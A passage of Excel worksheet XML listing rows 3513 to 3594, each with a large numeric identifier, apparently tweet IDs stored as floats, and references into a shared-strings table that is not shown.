        <v>8802</v>
      </c>
    </row>
    <row r="3513" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3513">
        <v>1.23483516140306E+18</v>
      </c>
      <c r="B3513" t="s">
        <v>8803</v>
      </c>
      <c r="C3513" t="s">
        <v>1</v>
      </c>
      <c r="D3513" t="s">
        <v>8804</v>
      </c>
      <c r="E3513" t="s">
        <v>4397</v>
      </c>
    </row>
    <row r="3514" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3514">
        <v>1.2348350843746801E+18</v>
      </c>
      <c r="B3514" t="s">
        <v>8805</v>
      </c>
      <c r="C3514" t="s">
        <v>1</v>
      </c>
      <c r="D3514" t="s">
        <v>8806</v>
      </c>
      <c r="E3514" t="s">
        <v>7220</v>
      </c>
    </row>
    <row r="3515" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3515">
        <v>1.23483499552254E+18</v>
      </c>
      <c r="B3515" t="s">
        <v>8807</v>
      </c>
      <c r="C3515" t="s">
        <v>1</v>
      </c>
      <c r="D3515" t="s">
        <v>8808</v>
      </c>
      <c r="E3515" t="s">
        <v>7772</v>
      </c>
    </row>
    <row r="3516" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3516">
        <v>1.23483493103087E+18</v>
      </c>
      <c r="B3516" t="s">
        <v>8809</v>
      </c>
      <c r="C3516" t="s">
        <v>1</v>
      </c>
      <c r="D3516" t="s">
        <v>8810</v>
      </c>
      <c r="E3516" t="s">
        <v>8811</v>
      </c>
    </row>
    <row r="3517" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3517">
        <v>1.2348348473126001E+18</v>
      </c>
      <c r="B3517" t="s">
        <v>8812</v>
      </c>
      <c r="C3517" t="s">
        <v>1</v>
      </c>
      <c r="D3517" t="s">
        <v>8813</v>
      </c>
      <c r="E3517" t="s">
        <v>8814</v>
      </c>
    </row>
    <row r="3518" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3518">
        <v>1.2348347050920901E+18</v>
      </c>
      <c r="B3518" t="s">
        <v>8815</v>
      </c>
      <c r="C3518" t="s">
        <v>1</v>
      </c>
      <c r="D3518" t="s">
        <v>8816</v>
      </c>
      <c r="E3518" t="s">
        <v>8817</v>
      </c>
    </row>
    <row r="3519" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3519">
        <v>1.23483467819825E+18</v>
      </c>
      <c r="B3519" t="s">
        <v>8818</v>
      </c>
      <c r="C3519" t="s">
        <v>1</v>
      </c>
      <c r="D3519" t="s">
        <v>8819</v>
      </c>
      <c r="E3519" t="s">
        <v>7141</v>
      </c>
    </row>
    <row r="3520" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3520">
        <v>1.23483463807137E+18</v>
      </c>
      <c r="B3520" t="s">
        <v>8820</v>
      </c>
      <c r="C3520" t="s">
        <v>1</v>
      </c>
      <c r="D3520" t="s">
        <v>8821</v>
      </c>
      <c r="E3520" t="s">
        <v>8822</v>
      </c>
    </row>
    <row r="3521" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3521">
        <v>1.2348346209124201E+18</v>
      </c>
      <c r="B3521" t="s">
        <v>8823</v>
      </c>
      <c r="C3521" t="s">
        <v>1</v>
      </c>
      <c r="D3521" t="s">
        <v>8824</v>
      </c>
      <c r="E3521" t="s">
        <v>8825</v>
      </c>
    </row>
    <row r="3522" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3522">
        <v>1.2348345619573299E+18</v>
      </c>
      <c r="B3522" t="s">
        <v>8826</v>
      </c>
      <c r="C3522" t="s">
        <v>1</v>
      </c>
      <c r="D3522" t="s">
        <v>8827</v>
      </c>
      <c r="E3522" t="s">
        <v>8828</v>
      </c>
    </row>
    <row r="3523" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3523">
        <v>1.2348344849163599E+18</v>
      </c>
      <c r="B3523" t="s">
        <v>8829</v>
      </c>
      <c r="C3523" t="s">
        <v>1</v>
      </c>
      <c r="D3523" t="s">
        <v>8830</v>
      </c>
      <c r="E3523" t="s">
        <v>670</v>
      </c>
    </row>
    <row r="3524" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3524">
        <v>1.2348344559923899E+18</v>
      </c>
      <c r="B3524" t="s">
        <v>8831</v>
      </c>
      <c r="C3524" t="s">
        <v>1</v>
      </c>
      <c r="D3524" t="s">
        <v>8832</v>
      </c>
      <c r="E3524" t="s">
        <v>8833</v>
      </c>
    </row>
    <row r="3525" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3525">
        <v>1.23483423878195E+18</v>
      </c>
      <c r="B3525" t="s">
        <v>8834</v>
      </c>
      <c r="C3525" t="s">
        <v>1</v>
      </c>
      <c r="D3525" t="s">
        <v>8835</v>
      </c>
      <c r="E3525" t="s">
        <v>7117</v>
      </c>
    </row>
    <row r="3526" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3526">
        <v>1.2348342123159601E+18</v>
      </c>
      <c r="B3526" t="s">
        <v>8836</v>
      </c>
      <c r="C3526" t="s">
        <v>1</v>
      </c>
      <c r="D3526" t="s">
        <v>8837</v>
      </c>
      <c r="E3526" t="s">
        <v>8838</v>
      </c>
    </row>
    <row r="3527" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3527">
        <v>1.23483404256829E+18</v>
      </c>
      <c r="B3527" t="s">
        <v>8839</v>
      </c>
      <c r="C3527" t="s">
        <v>1</v>
      </c>
      <c r="D3527" t="s">
        <v>8840</v>
      </c>
      <c r="E3527" t="s">
        <v>6166</v>
      </c>
    </row>
    <row r="3528" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3528">
        <v>1.2348339952565399E+18</v>
      </c>
      <c r="B3528" t="s">
        <v>8841</v>
      </c>
      <c r="C3528" t="s">
        <v>1</v>
      </c>
      <c r="D3528" t="s">
        <v>8842</v>
      </c>
      <c r="E3528" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="3529" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3529">
        <v>1.2348339261552699E+18</v>
      </c>
      <c r="B3529" t="s">
        <v>8843</v>
      </c>
      <c r="C3529" t="s">
        <v>1</v>
      </c>
      <c r="D3529" t="s">
        <v>8844</v>
      </c>
      <c r="E3529" t="s">
        <v>8845</v>
      </c>
    </row>
    <row r="3530" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3530">
        <v>1.2348339246202399E+18</v>
      </c>
      <c r="B3530" t="s">
        <v>8843</v>
      </c>
      <c r="C3530" t="s">
        <v>1</v>
      </c>
      <c r="D3530" t="s">
        <v>8846</v>
      </c>
      <c r="E3530" t="s">
        <v>8847</v>
      </c>
    </row>
    <row r="3531" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3531">
        <v>1.23483391800158E+18</v>
      </c>
      <c r="B3531" t="s">
        <v>8848</v>
      </c>
      <c r="C3531" t="s">
        <v>1</v>
      </c>
      <c r="D3531" t="s">
        <v>8849</v>
      </c>
      <c r="E3531" t="s">
        <v>7235</v>
      </c>
    </row>
    <row r="3532" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3532">
        <v>1.2348338887672801E+18</v>
      </c>
      <c r="B3532" t="s">
        <v>8850</v>
      </c>
      <c r="C3532" t="s">
        <v>1</v>
      </c>
      <c r="D3532" t="s">
        <v>8851</v>
      </c>
      <c r="E3532" t="s">
        <v>6040</v>
      </c>
    </row>
    <row r="3533" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3533">
        <v>1.23483384780991E+18</v>
      </c>
      <c r="B3533" t="s">
        <v>8852</v>
      </c>
      <c r="C3533" t="s">
        <v>1</v>
      </c>
      <c r="D3533" t="s">
        <v>8853</v>
      </c>
      <c r="E3533" t="s">
        <v>7238</v>
      </c>
    </row>
    <row r="3534" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3534">
        <v>1.2348338449368499E+18</v>
      </c>
      <c r="B3534" t="s">
        <v>8854</v>
      </c>
      <c r="C3534" t="s">
        <v>1</v>
      </c>
      <c r="D3534" t="s">
        <v>8855</v>
      </c>
      <c r="E3534" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="3535" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3535">
        <v>1.23483373368285E+18</v>
      </c>
      <c r="B3535" t="s">
        <v>8856</v>
      </c>
      <c r="C3535" t="s">
        <v>1</v>
      </c>
      <c r="D3535" t="s">
        <v>8857</v>
      </c>
      <c r="E3535" t="s">
        <v>1501</v>
      </c>
    </row>
    <row r="3536" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3536">
        <v>1.2348337266952599E+18</v>
      </c>
      <c r="B3536" t="s">
        <v>8858</v>
      </c>
      <c r="C3536" t="s">
        <v>1</v>
      </c>
      <c r="D3536" t="s">
        <v>8859</v>
      </c>
      <c r="E3536" t="s">
        <v>8860</v>
      </c>
    </row>
    <row r="3537" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3537">
        <v>1.23483363474765E+18</v>
      </c>
      <c r="B3537" t="s">
        <v>8861</v>
      </c>
      <c r="C3537" t="s">
        <v>1</v>
      </c>
      <c r="D3537" t="s">
        <v>8862</v>
      </c>
      <c r="E3537" t="s">
        <v>6004</v>
      </c>
    </row>
    <row r="3538" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3538">
        <v>1.2348335029333299E+18</v>
      </c>
      <c r="B3538" t="s">
        <v>8863</v>
      </c>
      <c r="C3538" t="s">
        <v>1</v>
      </c>
      <c r="D3538" t="s">
        <v>8864</v>
      </c>
      <c r="E3538" t="s">
        <v>8865</v>
      </c>
    </row>
    <row r="3539" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3539">
        <v>1.2348334885677599E+18</v>
      </c>
      <c r="B3539" t="s">
        <v>8866</v>
      </c>
      <c r="C3539" t="s">
        <v>1</v>
      </c>
      <c r="D3539" t="s">
        <v>8867</v>
      </c>
      <c r="E3539" t="s">
        <v>8868</v>
      </c>
    </row>
    <row r="3540" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3540">
        <v>1.23483341843469E+18</v>
      </c>
      <c r="B3540" t="s">
        <v>8869</v>
      </c>
      <c r="C3540" t="s">
        <v>1</v>
      </c>
      <c r="D3540" t="s">
        <v>8870</v>
      </c>
      <c r="E3540" t="s">
        <v>980</v>
      </c>
    </row>
    <row r="3541" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3541">
        <v>1.23483340898093E+18</v>
      </c>
      <c r="B3541" t="s">
        <v>8871</v>
      </c>
      <c r="C3541" t="s">
        <v>1</v>
      </c>
      <c r="D3541" t="s">
        <v>8872</v>
      </c>
      <c r="E3541" t="s">
        <v>3391</v>
      </c>
    </row>
    <row r="3542" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3542">
        <v>1.2348333020806999E+18</v>
      </c>
      <c r="B3542" t="s">
        <v>8873</v>
      </c>
      <c r="C3542" t="s">
        <v>1</v>
      </c>
      <c r="D3542" t="s">
        <v>8874</v>
      </c>
      <c r="E3542" t="s">
        <v>8875</v>
      </c>
    </row>
    <row r="3543" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3543">
        <v>1.2348332492114701E+18</v>
      </c>
      <c r="B3543" t="s">
        <v>8876</v>
      </c>
      <c r="C3543" t="s">
        <v>1</v>
      </c>
      <c r="D3543" t="s">
        <v>8877</v>
      </c>
      <c r="E3543" t="s">
        <v>2296</v>
      </c>
    </row>
    <row r="3544" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3544">
        <v>1.2348331709079601E+18</v>
      </c>
      <c r="B3544" t="s">
        <v>8878</v>
      </c>
      <c r="C3544" t="s">
        <v>1</v>
      </c>
      <c r="D3544" t="s">
        <v>8879</v>
      </c>
      <c r="E3544" t="s">
        <v>4809</v>
      </c>
    </row>
    <row r="3545" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3545">
        <v>1.2348331537742999E+18</v>
      </c>
      <c r="B3545" t="s">
        <v>8880</v>
      </c>
      <c r="C3545" t="s">
        <v>1</v>
      </c>
      <c r="D3545" t="s">
        <v>8881</v>
      </c>
      <c r="E3545" t="s">
        <v>8882</v>
      </c>
    </row>
    <row r="3546" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3546">
        <v>1.23483307115902E+18</v>
      </c>
      <c r="B3546" t="s">
        <v>8883</v>
      </c>
      <c r="C3546" t="s">
        <v>1</v>
      </c>
      <c r="D3546" t="s">
        <v>8884</v>
      </c>
      <c r="E3546" t="s">
        <v>1030</v>
      </c>
    </row>
    <row r="3547" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3547">
        <v>1.2348330312963999E+18</v>
      </c>
      <c r="B3547" t="s">
        <v>8885</v>
      </c>
      <c r="C3547" t="s">
        <v>1</v>
      </c>
      <c r="D3547" t="s">
        <v>8886</v>
      </c>
      <c r="E3547" t="s">
        <v>8887</v>
      </c>
    </row>
    <row r="3548" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3548">
        <v>1.2348330297151099E+18</v>
      </c>
      <c r="B3548" t="s">
        <v>8885</v>
      </c>
      <c r="C3548" t="s">
        <v>1</v>
      </c>
      <c r="D3548" t="s">
        <v>8888</v>
      </c>
      <c r="E3548" t="s">
        <v>8889</v>
      </c>
    </row>
    <row r="3549" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3549">
        <v>1.2348329149044401E+18</v>
      </c>
      <c r="B3549" t="s">
        <v>8890</v>
      </c>
      <c r="C3549" t="s">
        <v>1</v>
      </c>
      <c r="D3549" t="s">
        <v>8891</v>
      </c>
      <c r="E3549" t="s">
        <v>8892</v>
      </c>
    </row>
    <row r="3550" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3550">
        <v>1.23483276927825E+18</v>
      </c>
      <c r="B3550" t="s">
        <v>8893</v>
      </c>
      <c r="C3550" t="s">
        <v>1</v>
      </c>
      <c r="D3550" t="s">
        <v>8894</v>
      </c>
      <c r="E3550" t="s">
        <v>2096</v>
      </c>
    </row>
    <row r="3551" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3551">
        <v>1.23483275211505E+18</v>
      </c>
      <c r="B3551" t="s">
        <v>8895</v>
      </c>
      <c r="C3551" t="s">
        <v>1</v>
      </c>
      <c r="D3551" t="s">
        <v>8896</v>
      </c>
      <c r="E3551" t="s">
        <v>495</v>
      </c>
    </row>
    <row r="3552" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3552">
        <v>1.2348327130452201E+18</v>
      </c>
      <c r="B3552" t="s">
        <v>8897</v>
      </c>
      <c r="C3552" t="s">
        <v>1</v>
      </c>
      <c r="D3552" t="s">
        <v>8898</v>
      </c>
      <c r="E3552" t="s">
        <v>8899</v>
      </c>
    </row>
    <row r="3553" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3553">
        <v>1.23483257749359E+18</v>
      </c>
      <c r="B3553" t="s">
        <v>8900</v>
      </c>
      <c r="C3553" t="s">
        <v>1</v>
      </c>
      <c r="D3553" t="s">
        <v>8901</v>
      </c>
      <c r="E3553" t="s">
        <v>1801</v>
      </c>
    </row>
    <row r="3554" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3554">
        <v>1.2348321700128699E+18</v>
      </c>
      <c r="B3554" t="s">
        <v>8902</v>
      </c>
      <c r="C3554" t="s">
        <v>1</v>
      </c>
      <c r="D3554" t="s">
        <v>8903</v>
      </c>
      <c r="E3554" t="s">
        <v>8904</v>
      </c>
    </row>
    <row r="3555" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3555">
        <v>1.2348317336081001E+18</v>
      </c>
      <c r="B3555" t="s">
        <v>8905</v>
      </c>
      <c r="C3555" t="s">
        <v>1</v>
      </c>
      <c r="D3555" t="s">
        <v>8906</v>
      </c>
      <c r="E3555" t="s">
        <v>8907</v>
      </c>
    </row>
    <row r="3556" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3556">
        <v>1.23483154036813E+18</v>
      </c>
      <c r="B3556" t="s">
        <v>8908</v>
      </c>
      <c r="C3556" t="s">
        <v>1</v>
      </c>
      <c r="D3556" t="s">
        <v>8909</v>
      </c>
      <c r="E3556" t="s">
        <v>5544</v>
      </c>
    </row>
    <row r="3557" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3557">
        <v>1.2348314893696E+18</v>
      </c>
      <c r="B3557" t="s">
        <v>8910</v>
      </c>
      <c r="C3557" t="s">
        <v>1</v>
      </c>
      <c r="D3557" t="s">
        <v>8911</v>
      </c>
      <c r="E3557" t="s">
        <v>2895</v>
      </c>
    </row>
    <row r="3558" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3558">
        <v>1.2348312378370099E+18</v>
      </c>
      <c r="B3558" t="s">
        <v>8912</v>
      </c>
      <c r="C3558" t="s">
        <v>1</v>
      </c>
      <c r="D3558" t="s">
        <v>8913</v>
      </c>
      <c r="E3558" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="3559" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3559">
        <v>1.2348312285509E+18</v>
      </c>
      <c r="B3559" t="s">
        <v>8914</v>
      </c>
      <c r="C3559" t="s">
        <v>1</v>
      </c>
      <c r="D3559" t="s">
        <v>8915</v>
      </c>
      <c r="E3559" t="s">
        <v>8916</v>
      </c>
    </row>
    <row r="3560" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3560">
        <v>1.2348309370844201E+18</v>
      </c>
      <c r="B3560" t="s">
        <v>8917</v>
      </c>
      <c r="C3560" t="s">
        <v>1</v>
      </c>
      <c r="D3560" t="s">
        <v>8918</v>
      </c>
      <c r="E3560" t="s">
        <v>8919</v>
      </c>
    </row>
    <row r="3561" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3561">
        <v>1.2348306837652301E+18</v>
      </c>
      <c r="B3561" t="s">
        <v>8920</v>
      </c>
      <c r="C3561" t="s">
        <v>1</v>
      </c>
      <c r="D3561" t="s">
        <v>8921</v>
      </c>
      <c r="E3561" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="3562" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3562">
        <v>1.2348306835641101E+18</v>
      </c>
      <c r="B3562" t="s">
        <v>8920</v>
      </c>
      <c r="C3562" t="s">
        <v>1</v>
      </c>
      <c r="D3562" t="s">
        <v>8922</v>
      </c>
      <c r="E3562" t="s">
        <v>8923</v>
      </c>
    </row>
    <row r="3563" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3563">
        <v>1.23483044431683E+18</v>
      </c>
      <c r="B3563" t="s">
        <v>8924</v>
      </c>
      <c r="C3563" t="s">
        <v>1</v>
      </c>
      <c r="D3563" t="s">
        <v>8925</v>
      </c>
      <c r="E3563" t="s">
        <v>8926</v>
      </c>
    </row>
    <row r="3564" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3564">
        <v>1.2348303941613499E+18</v>
      </c>
      <c r="B3564" t="s">
        <v>8927</v>
      </c>
      <c r="C3564" t="s">
        <v>1</v>
      </c>
      <c r="D3564" t="s">
        <v>8928</v>
      </c>
      <c r="E3564" t="s">
        <v>2901</v>
      </c>
    </row>
    <row r="3565" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3565">
        <v>1.2348297263652201E+18</v>
      </c>
      <c r="B3565" t="s">
        <v>8929</v>
      </c>
      <c r="C3565" t="s">
        <v>1</v>
      </c>
      <c r="D3565" t="s">
        <v>8930</v>
      </c>
      <c r="E3565" t="s">
        <v>8931</v>
      </c>
    </row>
    <row r="3566" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3566">
        <v>1.2348295570578801E+18</v>
      </c>
      <c r="B3566" t="s">
        <v>8932</v>
      </c>
      <c r="C3566" t="s">
        <v>1</v>
      </c>
      <c r="D3566" t="s">
        <v>8933</v>
      </c>
      <c r="E3566" t="s">
        <v>8934</v>
      </c>
    </row>
    <row r="3567" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3567">
        <v>1.2348295556150999E+18</v>
      </c>
      <c r="B3567" t="s">
        <v>8935</v>
      </c>
      <c r="C3567" t="s">
        <v>1</v>
      </c>
      <c r="D3567" t="s">
        <v>8936</v>
      </c>
      <c r="E3567" t="s">
        <v>8937</v>
      </c>
    </row>
    <row r="3568" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3568">
        <v>1.23482955366893E+18</v>
      </c>
      <c r="B3568" t="s">
        <v>8935</v>
      </c>
      <c r="C3568" t="s">
        <v>1</v>
      </c>
      <c r="D3568" t="s">
        <v>8938</v>
      </c>
      <c r="E3568" t="s">
        <v>8939</v>
      </c>
    </row>
    <row r="3569" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3569">
        <v>1.23482951158739E+18</v>
      </c>
      <c r="B3569" t="s">
        <v>8940</v>
      </c>
      <c r="C3569" t="s">
        <v>1</v>
      </c>
      <c r="D3569" t="s">
        <v>8941</v>
      </c>
      <c r="E3569" t="s">
        <v>4397</v>
      </c>
    </row>
    <row r="3570" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3570">
        <v>1.23482941994194E+18</v>
      </c>
      <c r="B3570" t="s">
        <v>8942</v>
      </c>
      <c r="C3570" t="s">
        <v>1</v>
      </c>
      <c r="D3570" t="s">
        <v>8943</v>
      </c>
      <c r="E3570" t="s">
        <v>8944</v>
      </c>
    </row>
    <row r="3571" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3571">
        <v>1.2348291918892401E+18</v>
      </c>
      <c r="B3571" t="s">
        <v>8945</v>
      </c>
      <c r="C3571" t="s">
        <v>1</v>
      </c>
      <c r="D3571" t="s">
        <v>8946</v>
      </c>
      <c r="E3571" t="s">
        <v>8947</v>
      </c>
    </row>
    <row r="3572" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3572">
        <v>1.2348290539511099E+18</v>
      </c>
      <c r="B3572" t="s">
        <v>8948</v>
      </c>
      <c r="C3572" t="s">
        <v>1</v>
      </c>
      <c r="D3572" t="s">
        <v>8949</v>
      </c>
      <c r="E3572" t="s">
        <v>8950</v>
      </c>
    </row>
    <row r="3573" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3573">
        <v>1.2348286228270799E+18</v>
      </c>
      <c r="B3573" t="s">
        <v>8951</v>
      </c>
      <c r="C3573" t="s">
        <v>1</v>
      </c>
      <c r="D3573" t="s">
        <v>8952</v>
      </c>
      <c r="E3573" t="s">
        <v>3060</v>
      </c>
    </row>
    <row r="3574" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3574">
        <v>1.23482838120578E+18</v>
      </c>
      <c r="B3574" t="s">
        <v>8953</v>
      </c>
      <c r="C3574" t="s">
        <v>1</v>
      </c>
      <c r="D3574" t="s">
        <v>8954</v>
      </c>
      <c r="E3574" t="s">
        <v>8955</v>
      </c>
    </row>
    <row r="3575" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3575">
        <v>1.2348282527969999E+18</v>
      </c>
      <c r="B3575" t="s">
        <v>8956</v>
      </c>
      <c r="C3575" t="s">
        <v>1</v>
      </c>
      <c r="D3575" t="s">
        <v>8957</v>
      </c>
      <c r="E3575" t="s">
        <v>8958</v>
      </c>
    </row>
    <row r="3576" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3576">
        <v>1.2348280258979E+18</v>
      </c>
      <c r="B3576" t="s">
        <v>8959</v>
      </c>
      <c r="C3576" t="s">
        <v>1</v>
      </c>
      <c r="D3576" t="s">
        <v>8960</v>
      </c>
      <c r="E3576" t="s">
        <v>7523</v>
      </c>
    </row>
    <row r="3577" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3577">
        <v>1.2348274923404401E+18</v>
      </c>
      <c r="B3577" t="s">
        <v>8961</v>
      </c>
      <c r="C3577" t="s">
        <v>1</v>
      </c>
      <c r="D3577" t="s">
        <v>8962</v>
      </c>
      <c r="E3577" t="s">
        <v>8963</v>
      </c>
    </row>
    <row r="3578" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3578">
        <v>1.2348273787964301E+18</v>
      </c>
      <c r="B3578" t="s">
        <v>8964</v>
      </c>
      <c r="C3578" t="s">
        <v>1</v>
      </c>
      <c r="D3578" t="s">
        <v>8965</v>
      </c>
      <c r="E3578" t="s">
        <v>8966</v>
      </c>
    </row>
    <row r="3579" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3579">
        <v>1.23482717670654E+18</v>
      </c>
      <c r="B3579" t="s">
        <v>8967</v>
      </c>
      <c r="C3579" t="s">
        <v>1</v>
      </c>
      <c r="D3579" t="s">
        <v>8968</v>
      </c>
      <c r="E3579" t="s">
        <v>1774</v>
      </c>
    </row>
    <row r="3580" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3580">
        <v>1.23482717427374E+18</v>
      </c>
      <c r="B3580" t="s">
        <v>8969</v>
      </c>
      <c r="C3580" t="s">
        <v>1</v>
      </c>
      <c r="D3580" t="s">
        <v>8970</v>
      </c>
      <c r="E3580" t="s">
        <v>8971</v>
      </c>
    </row>
    <row r="3581" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3581">
        <v>1.23482710651486E+18</v>
      </c>
      <c r="B3581" t="s">
        <v>8972</v>
      </c>
      <c r="C3581" t="s">
        <v>1</v>
      </c>
      <c r="D3581" t="s">
        <v>8973</v>
      </c>
      <c r="E3581" t="s">
        <v>4823</v>
      </c>
    </row>
    <row r="3582" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3582">
        <v>1.23482698686815E+18</v>
      </c>
      <c r="B3582" t="s">
        <v>8974</v>
      </c>
      <c r="C3582" t="s">
        <v>1</v>
      </c>
      <c r="D3582" t="s">
        <v>8975</v>
      </c>
      <c r="E3582" t="s">
        <v>8976</v>
      </c>
    </row>
    <row r="3583" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3583">
        <v>1.23482672931265E+18</v>
      </c>
      <c r="B3583" t="s">
        <v>8977</v>
      </c>
      <c r="C3583" t="s">
        <v>1</v>
      </c>
      <c r="D3583" t="s">
        <v>8978</v>
      </c>
      <c r="E3583" t="s">
        <v>8979</v>
      </c>
    </row>
    <row r="3584" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3584">
        <v>1.2348267106480699E+18</v>
      </c>
      <c r="B3584" t="s">
        <v>8980</v>
      </c>
      <c r="C3584" t="s">
        <v>1</v>
      </c>
      <c r="D3584" t="s">
        <v>8981</v>
      </c>
      <c r="E3584" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="3585" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3585">
        <v>1.2348265060330701E+18</v>
      </c>
      <c r="B3585" t="s">
        <v>8982</v>
      </c>
      <c r="C3585" t="s">
        <v>1</v>
      </c>
      <c r="D3585" t="s">
        <v>8983</v>
      </c>
      <c r="E3585" t="s">
        <v>8984</v>
      </c>
    </row>
    <row r="3586" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3586">
        <v>1.2348263207791201E+18</v>
      </c>
      <c r="B3586" t="s">
        <v>8985</v>
      </c>
      <c r="C3586" t="s">
        <v>1</v>
      </c>
      <c r="D3586" t="s">
        <v>8986</v>
      </c>
      <c r="E3586" t="s">
        <v>8987</v>
      </c>
    </row>
    <row r="3587" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3587">
        <v>1.2348262813023301E+18</v>
      </c>
      <c r="B3587" t="s">
        <v>8988</v>
      </c>
      <c r="C3587" t="s">
        <v>1</v>
      </c>
      <c r="D3587" t="s">
        <v>8989</v>
      </c>
      <c r="E3587" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="3588" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3588">
        <v>1.2348262799181E+18</v>
      </c>
      <c r="B3588" t="s">
        <v>8990</v>
      </c>
      <c r="C3588" t="s">
        <v>1</v>
      </c>
      <c r="D3588" t="s">
        <v>8991</v>
      </c>
      <c r="E3588" t="s">
        <v>8992</v>
      </c>
    </row>
    <row r="3589" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3589">
        <v>1.2348262383652401E+18</v>
      </c>
      <c r="B3589" t="s">
        <v>8993</v>
      </c>
      <c r="C3589" t="s">
        <v>1</v>
      </c>
      <c r="D3589" t="s">
        <v>8994</v>
      </c>
      <c r="E3589" t="s">
        <v>8995</v>
      </c>
    </row>
    <row r="3590" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3590">
        <v>1.23482622446112E+18</v>
      </c>
      <c r="B3590" t="s">
        <v>8996</v>
      </c>
      <c r="C3590" t="s">
        <v>1</v>
      </c>
      <c r="D3590" t="s">
        <v>8997</v>
      </c>
      <c r="E3590" t="s">
        <v>7368</v>
      </c>
    </row>
    <row r="3591" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3591">
        <v>1.2348260274209999E+18</v>
      </c>
      <c r="B3591" t="s">
        <v>8998</v>
      </c>
      <c r="C3591" t="s">
        <v>1</v>
      </c>
      <c r="D3591" t="s">
        <v>8999</v>
      </c>
      <c r="E3591" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="3592" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3592">
        <v>1.23482601922544E+18</v>
      </c>
      <c r="B3592" t="s">
        <v>9000</v>
      </c>
      <c r="C3592" t="s">
        <v>1</v>
      </c>
      <c r="D3592" t="s">
        <v>9001</v>
      </c>
      <c r="E3592" t="s">
        <v>9002</v>
      </c>
    </row>
    <row r="3593" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A3593">
        <v>1.23482601800065E+18</v>
      </c>
      <c r="B3593" t="s">
        <v>9000</v>
      </c>
      <c r="C3593" t="s">
        <v>1</v>
      </c>
      <c r="D3593" t="s">
        <v>9003</v>
      </c>
      <c r="E3593" t="s">
        <v>9004</v>
      </c>
    </row>
    <row r="3594" spans="1:5" x14ac:dyDescent="0.25">
